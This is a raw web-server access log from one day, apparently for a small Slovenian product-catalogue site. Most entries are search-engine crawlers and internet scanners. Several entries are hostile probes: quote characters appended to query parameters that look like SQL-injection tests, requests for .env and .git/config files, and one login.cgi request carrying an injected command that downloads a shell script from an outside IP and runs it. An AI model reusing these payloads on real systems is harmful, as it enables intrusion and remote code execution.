66.249.66.44 - - [06/Oct/2024:07:57:54 +0200] "GET /info.php?sifra=4RTO83&skupina=31 HTTP/1.1" 200 17779 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [06/Oct/2024:08:05:59 +0200] "GET /skupine.php?skupina=32 HTTP/1.1" 200 25473 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [06/Oct/2024:08:06:00 +0200] "GET /skupine.php?skupina=31&stran=1 HTTP/1.1" 200 25697 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
167.94.146.62 - - [06/Oct/2024:08:06:25 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
167.94.146.62 - - [06/Oct/2024:08:06:28 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.62 - - [06/Oct/2024:08:06:29 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.62 - - [06/Oct/2024:08:06:29 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
66.249.66.43 - - [06/Oct/2024:08:23:08 +0200] "GET /info.php?sifra=V135&skupina=0 HTTP/1.1" 200 17161 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:08:29:00 +0200] "GET /skupine.php?skupina=31&stran=5 HTTP/1.1" 200 23607 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:08:33:01 +0200] "GET /skupine.php?skupina=46 HTTP/1.1" 200 25377 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:08:38:01 +0200] "GET /skupine.php?skupina=0 HTTP/1.1" 200 25527 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:08:43:01 +0200] "GET /skupine.php?skupina=124 HTTP/1.1" 200 15662 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:08:43:02 +0200] "GET /placila.php HTTP/1.1" 200 15376 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
167.94.145.104 - - [06/Oct/2024:09:04:27 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
167.94.145.104 - - [06/Oct/2024:09:04:30 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.104 - - [06/Oct/2024:09:04:30 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.104 - - [06/Oct/2024:09:04:30 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
66.249.66.42 - - [06/Oct/2024:09:17:43 +0200] "GET /info.php?sifra=kos002&skupina=133 HTTP/1.1" 200 17456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.79.162.204 - - [06/Oct/2024:09:41:04 +0200] "GET / HTTP/1.0" 200 20819 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
191.81.176.135 - - [06/Oct/2024:10:13:33 +0200] "GET / HTTP/1.0" 200 16604 "-" "-"
66.249.66.43 - - [06/Oct/2024:10:35:49 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:10:47:29 +0200] "GET /skupine.php?skupina=106 HTTP/1.1" 200 23264 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
141.98.255.145 - - [06/Oct/2024:11:12:45 +0200] "GET /info.php?sifra=01.060&skupina=34 HTTP/1.1" 200 17906 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.166 Safari/537.36 OPR/20.0.1396.73172"
141.98.255.145 - - [06/Oct/2024:11:12:46 +0200] "GET /info.php?sifra=01.060%27&skupina=34 HTTP/1.1" 200 17796 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)"
141.98.255.145 - - [06/Oct/2024:11:12:46 +0200] "GET /info.php?sifra=01.060&skupina=34%27 HTTP/1.1" 200 17084 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7"
66.249.66.44 - - [06/Oct/2024:11:41:11 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [06/Oct/2024:11:41:11 +0200] "GET /info.php?sifra=28515&skupina=82 HTTP/1.1" 200 19129 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
141.98.255.145 - - [06/Oct/2024:12:04:22 +0200] "GET /info.php?sifra=95SNS&skupina=136 HTTP/1.1" 200 17042 "-" "Mozilla/5.0 (Linux; U; Android 11; zh-CN; M2012K11AC Build/RKQ1.200826.002) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.108 Quark/5.4.8.200 Mobile Safari/537.36"
141.98.255.145 - - [06/Oct/2024:12:04:22 +0200] "GET /info.php?sifra=95SNS%27&skupina=136 HTTP/1.1" 200 16986 "-" "Mozilla/5.0 (Linux; Android 11; SM-G980F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36"
141.98.255.145 - - [06/Oct/2024:12:04:22 +0200] "GET /info.php?sifra=95SNS&skupina=136%27 HTTP/1.1" 200 17032 "-" "Mozilla/5.0 (X11; Linux i686 (x86_64)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3187.0 Safari/537.366"
5.161.60.75 - - [06/Oct/2024:12:25:37 +0200] "GET /skupine.php?skupina=53%27 HTTP/1.1" 200 13088 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
43.254.158.137 - - [06/Oct/2024:12:39:45 +0200] "GET /" 400 474 "-" "-"
128.90.141.6 - - [06/Oct/2024:13:12:17 +0200] "GET /skupine.php?skupina=42%27&stran=3 HTTP/1.1" 200 13088 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
128.90.141.6 - - [06/Oct/2024:13:12:18 +0200] "GET /skupine.php?skupina=42&stran=3%27 HTTP/1.1" 200 26436 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
141.98.255.145 - - [06/Oct/2024:14:06:35 +0200] "GET /info.php?sifra=kos%20001&skupina=0 HTTP/1.1" 200 17389 "-" "Mozilla/5.0 (Linux; Android 5.1.1; Coolpad 3622A Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36"
141.98.255.145 - - [06/Oct/2024:14:06:35 +0200] "GET /info.php?sifra=kos+001%27&skupina=0 HTTP/1.1" 200 16965 "-" "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36"
141.98.255.145 - - [06/Oct/2024:14:06:35 +0200] "GET /info.php?sifra=kos+001&skupina=0%27 HTTP/1.1" 200 17394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.151 Whale/3.14.134.62 Safari/537.36"
66.249.66.42 - - [06/Oct/2024:14:10:10 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
141.98.255.145 - - [06/Oct/2024:14:28:35 +0200] "GET /skupine.php?skupina=126 HTTP/1.1" 200 15734 "-" "Mozilla/5.0 (Linux; Android 8.1.0; TECNO KA7O Build/O11019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.120 Mobile Safari/537.36"
141.98.255.145 - - [06/Oct/2024:14:28:35 +0200] "GET /skupine.php?skupina=126%27 HTTP/1.1" 200 13089 "-" "HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0"
66.249.72.100 - - [06/Oct/2024:16:05:06 +0200] "GET /slike/Slika20012-1m.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
66.249.72.99 - - [06/Oct/2024:16:12:06 +0200] "GET /info.php?sifra=HDEM135&skupina=82 HTTP/1.1" 200 19400 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.99 - - [06/Oct/2024:16:12:07 +0200] "GET /info.php?sifra=kos%20001&skupina=0 HTTP/1.1" 200 17389 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.99 - - [06/Oct/2024:16:16:52 +0200] "GET /skupine.php?skupina=51 HTTP/1.1" 200 18377 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.99 - - [06/Oct/2024:16:23:53 +0200] "GET /info.php?sifra=kos%20001&skupina=134 HTTP/1.1" 200 17673 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.99 - - [06/Oct/2024:16:37:13 +0200] "GET /info.php?sifra=95DNS&skupina=0 HTTP/1.1" 200 17022 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.101 - - [06/Oct/2024:16:58:02 +0200] "GET /skupine.php?skupina=54 HTTP/1.1" 200 22004 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.32.126.137 - - [06/Oct/2024:17:09:43 +0200] "GET /info.php?sifra=2RPP&skupina=31 HTTP/1.1" 200 17716 "-" "Mozilla/5.0 (Linux; Android 11; SM-A415F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36"
193.32.126.137 - - [06/Oct/2024:17:09:43 +0200] "GET /info.php?sifra=2RPP%27&skupina=31 HTTP/1.1" 200 17601 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0"
193.32.126.137 - - [06/Oct/2024:17:09:44 +0200] "GET /info.php?sifra=2RPP&skupina=31%27 HTTP/1.1" 200 17087 "-" "MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0"
66.249.72.101 - - [06/Oct/2024:17:23:05 +0200] "GET /info.php?sifra=kos%20001&skupina=133 HTTP/1.1" 200 17619 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
206.189.155.69 - - [06/Oct/2024:17:34:28 +0200] "GET /ab2g HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
206.189.155.69 - - [06/Oct/2024:17:34:29 +0200] "GET /ab2h HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
206.189.155.69 - - [06/Oct/2024:17:34:29 +0200] "GET /alive.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
206.189.155.69 - - [06/Oct/2024:17:34:33 +0200] "GET /" 400 474 "-" "-"
206.189.155.69 - - [06/Oct/2024:17:34:34 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
206.189.155.69 - - [06/Oct/2024:17:34:34 +0200] "GET /" 400 474 "-" "-"
206.189.155.69 - - [06/Oct/2024:17:34:35 +0200] "GET /t4 HTTP/1.1" 404 - "-" "Mozilla/5.0"
206.189.155.69 - - [06/Oct/2024:17:34:35 +0200] "GET /" 400 474 "-" "-"
206.189.155.69 - - [06/Oct/2024:17:34:36 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
206.189.155.69 - - [06/Oct/2024:17:34:37 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
206.189.155.69 - - [06/Oct/2024:17:34:37 +0200] "GET /teorema505?t=1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
66.249.72.100 - - [06/Oct/2024:17:43:13 +0200] "GET /info.php?sifra=KL80IBN&skupina=31 HTTP/1.1" 200 17806 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.32.126.137 - - [06/Oct/2024:18:43:27 +0200] "GET /skupine.php?skupina=77&stran=1 HTTP/1.1" 200 25067 "-" "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36"
193.32.126.137 - - [06/Oct/2024:18:43:27 +0200] "GET /skupine.php?skupina=77%27&stran=1 HTTP/1.1" 200 13088 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920)"
193.32.126.137 - - [06/Oct/2024:18:43:27 +0200] "GET /skupine.php?skupina=77&stran=1%27 HTTP/1.1" 200 25067 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4889.0 Safari/537.36"
190.242.46.102 - - [06/Oct/2024:19:04:58 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
66.249.72.101 - - [06/Oct/2024:19:07:20 +0200] "GET /podjetje.php HTTP/1.1" 200 16831 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.83.65.45 - - [06/Oct/2024:19:57:08 +0200] "GET /" 400 474 "-" "-"
146.70.144.93 - - [06/Oct/2024:19:58:27 +0200] "GET /skupine.php?skupina=34 HTTP/1.1" 200 25579 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8"
146.70.144.93 - - [06/Oct/2024:19:58:27 +0200] "GET /skupine.php?skupina=34%27 HTTP/1.1" 200 13088 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3"
195.16.79.74 - - [06/Oct/2024:20:04:15 +0200] "GET /status/ HTTP/1.1" 404 - "-" "Xenu Link Sleuth/1.3.8"
195.16.79.74 - - [06/Oct/2024:20:05:47 +0200] "GET /status/ HTTP/1.1" 404 - "-" "Xenu Link Sleuth/1.3.8"
167.94.145.96 - - [06/Oct/2024:20:12:47 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
167.94.145.96 - - [06/Oct/2024:20:12:50 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.96 - - [06/Oct/2024:20:12:50 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
167.99.138.224 - - [06/Oct/2024:20:15:45 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 Keydrop"
167.99.138.224 - - [06/Oct/2024:20:15:45 +0200] "GET /" 400 474 "-" "-"
193.32.126.137 - - [06/Oct/2024:20:17:29 +0200] "GET /skupine.php?skupina=48 HTTP/1.1" 200 18244 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 Edg/101.0.1210.32"
193.32.126.137 - - [06/Oct/2024:20:17:29 +0200] "GET /skupine.php?skupina=48%27 HTTP/1.1" 200 13088 "-" "Mozilla/5.0 (Linux; Android 12; SM-N770F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Mobile Safari/537.36 EdgA/101.0.1210.39"
95.137.225.150 - - [06/Oct/2024:21:02:20 +0200] "GET /" 400 474 "-" "-"
66.249.72.101 - - [06/Oct/2024:22:05:13 +0200] "GET /slike/16878_m.jpg HTTP/1.1" 200 3553 "-" "Googlebot-Image/1.0"
66.249.72.101 - - [06/Oct/2024:22:20:04 +0200] "GET /slike/50455_m.jpg HTTP/1.1" 200 3761 "-" "Googlebot-Image/1.0"
66.249.72.99 - - [06/Oct/2024:22:26:42 +0200] "GET /skupine.php?skupina=82 HTTP/1.1" 200 27509 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
183.103.91.152 - - [06/Oct/2024:22:34:29 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
66.249.72.100 - - [06/Oct/2024:22:48:43 +0200] "GET /akcija.php HTTP/1.1" 200 15359 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.101 - - [06/Oct/2024:23:20:09 +0200] "GET /info.php?sifra=kos002&skupina=133 HTTP/1.1" 200 17456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.235.24.178 - - [06/Oct/2024:23:21:41 +0200] "GET / HTTP/1.0" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.43 - - [06/Oct/2024:01:03:00 +0200] "GET /info.php?sifra=28515&skupina=82 HTTP/1.1" 200 19129 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:01:43:54 +0200] "GET /info.php?sifra=4RTO81&skupina=31 HTTP/1.1" 200 17823 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:01:59:55 +0200] "GET /info.php?sifra=HDEM105m&skupina=86 HTTP/1.1" 200 19181 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:02:09:00 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
37.139.5.66 - - [06/Oct/2024:03:04:14 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 226 "-" "linus-torvalds-loves-you"
66.249.66.44 - - [06/Oct/2024:03:44:02 +0200] "GET /pomoc_splosno.php HTTP/1.1" 200 15100 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.62.89.80 - - [06/Oct/2024:04:11:35 +0200] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
66.249.66.43 - - [06/Oct/2024:04:23:55 +0200] "GET /info.php?sifra=50151&skupina=40 HTTP/1.1" 200 17634 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:04:37:55 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [06/Oct/2024:04:46:07 +0200] "GET /info.php?sifra=535009&skupina=31 HTTP/1.1" 200 17731 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.32.170.31 - - [06/Oct/2024:04:53:53 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
66.249.66.43 - - [06/Oct/2024:04:56:55 +0200] "GET /skupine.php?skupina=40&stran=3 HTTP/1.1" 200 25418 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:04:57:56 +0200] "GET /skupine.php?skupina=82&stran=1 HTTP/1.1" 200 27505 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:05:00:56 +0200] "GET /info.php?sifra=252150&skupina=82 HTTP/1.1" 200 18954 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [06/Oct/2024:05:04:57 +0200] "GET /skupine.php?skupina=82&stran=3 HTTP/1.1" 200 27291 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [06/Oct/2024:05:15:57 +0200] "GET /info.php?sifra=MC2131&skupina=82 HTTP/1.1" 200 19159 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:05:18:57 +0200] "GET /skupine.php?skupina=82&stran=5 HTTP/1.1" 200 27860 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [06/Oct/2024:05:19:58 +0200] "GET /skupine.php?skupina=82&stran=6 HTTP/1.1" 200 23526 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [06/Oct/2024:05:22:58 +0200] "GET /skupine.php?skupina=82&stran=4 HTTP/1.1" 200 27543 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
